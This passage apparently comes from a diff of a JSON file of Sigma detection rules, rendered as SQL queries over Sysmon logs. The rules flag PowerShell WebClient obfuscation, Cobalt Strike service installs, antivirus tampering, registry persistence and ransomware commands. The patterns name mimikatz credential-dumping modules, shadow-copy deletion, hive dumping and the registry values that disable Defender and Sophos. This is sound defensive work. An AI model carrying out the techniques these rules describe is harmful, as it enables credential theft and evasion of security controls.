'%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE 
'%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE 
'%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE 
'%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\')) AND NOT ((Details LIKE '(Empty)' ESCAPE '\\' OR Details LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_webclient_casing.yml" + "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" }, { - "title": "Suspicious SYSTEM User Process Creation", - "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", + "title": "CobaltStrike Service Installations in Registry", + "id": 
"61a7697c-cb79-42a8-a2ff-5f0cdfae0130", "status": "test", - "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", - "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", + "author": "Wojciech Lesicki", + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" + ], "falsepositives": [ - "Administrative activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE 
'\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (Image LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE 
'%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((Details LIKE '%ADMIN$%' ESCAPE '\\' AND Details LIKE '%.exe%' ESCAPE '\\') OR (Details LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND Details LIKE '%start%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_system_user_anomaly.yml" + "filename": "registry_set_cobaltstrike_service_installs.yml" }, { - "title": "LockerGoga Ransomware Activity", - "id": "74db3488-fd28-480a-95aa-b7af626de068", - "status": "stable", - "description": "Detects LockerGoga ransomware activity via specific command line.", - "author": "Vasiliy Burov, oscd.community", + "title": "Tamper With Sophos AV Registry Keys", + "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", + "status": "experimental", + "description": "Detects tamper attempts to sophos av functionality via registry key modification", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR 
TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" + "filename": "registry_set_sophos_av_tamper.yml" }, { - "title": "Xwizard DLL Sideloading", - "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "title": "Disable Administrative Share Creation at Startup", + "id": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", "status": "test", - "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", - "author": "Christian Burkard (Nextron Systems)", + "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1070.005" ], "falsepositives": [ - "Windows installed on non-C drive" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%AutoShareWks' ESCAPE '\\' OR TargetObject LIKE '%AutoShareServer' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" + "filename": "registry_set_disable_administrative_share.yml" }, { - "title": "Suspicious Add Scheduled Task Parent", - "id": "9494479d-d994-40bf-a8b1-eea890237021", - "status": "experimental", - "description": "Detects suspicious 
scheduled task creations from a parent stored in a temporary folder", - "author": "Florian Roth (Nextron Systems)", + "title": "Internet Explorer Autorun Keys Modification", + "id": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%unattended.ini%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Toolbar%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer Bars%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((TargetObject LIKE 
'%\\\\Extensions\\\\{2670000A-7350-4f3c-8081-5663EE0C6C49}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Toolbar\\\\ShellBrowser\\\\ITBar7Layout' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\ShowDiscussionButton' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\Locked' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_schtasks_parent.yml" + "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml" }, { - "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", - "id": "e9b61244-893f-427c-b287-3e708f321c6b", + "title": "Potential Persistence Via AutodialDLL", + "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "status": "experimental", - "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". 
This technique provides an elevated command prompt to the user from the login screen without the need to log in.", - "author": "frack113", + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" + "filename": "registry_set_persistence_autodial_dll.yml" }, { - "title": "CreateDump Process Dump", - "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", + "title": "Disable Windows Defender Functionalities Via Registry Keys", + "id": "0eb46774-f1ab-4a74-8238-1155855f2263", "status": "experimental", - "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", + "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1562.001" ], "falsepositives": [ - "Command lines that use the same flags" + "Administrator actions" ], "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" ], - "filename": "proc_creation_win_lolbin_createdump.yml" + "filename": "registry_set_windows_defender_tamper.yml" }, { - "title": "Kavremover Dropped Binary LOLBIN Usage", - "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", + "title": "Potential Attachment Manager Settings Associations Tamper", + "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", 
"status": "experimental", - "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND Details = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (Details LIKE '%.zip;%' ESCAPE '\\' OR Details LIKE '%.rar;%' ESCAPE '\\' OR Details LIKE '%.exe;%' ESCAPE '\\' OR Details LIKE '%.bat;%' ESCAPE '\\' OR Details LIKE '%.com;%' ESCAPE '\\' OR Details LIKE '%.cmd;%' ESCAPE '\\' OR Details LIKE '%.reg;%' ESCAPE '\\' OR Details LIKE '%.msi;%' ESCAPE '\\' OR Details LIKE '%.htm;%' ESCAPE '\\' OR Details LIKE '%.html;%' ESCAPE '\\'))))" ], - 